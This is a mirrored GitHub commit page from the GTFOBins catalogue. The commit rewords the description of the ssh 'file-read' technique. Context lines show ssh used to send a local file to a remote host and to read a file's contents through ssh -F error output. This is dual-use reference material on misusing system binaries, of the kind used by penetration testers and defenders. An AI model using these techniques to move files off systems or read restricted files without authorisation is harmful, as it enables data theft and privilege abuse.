mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Rephrase ssh read
This commit is contained in:
parent
92af4c9f43
commit
1b5f2aedae
@ -18,7 +18,7 @@ functions:
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
file-read:
|
||||
- description: Read lines from text files (error-based approach).
|
||||
- description: The read file content is corrupted by error prints.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
ssh -F $LFILE localhost
|
||||
|
Loading…
Reference in New Issue
Block a user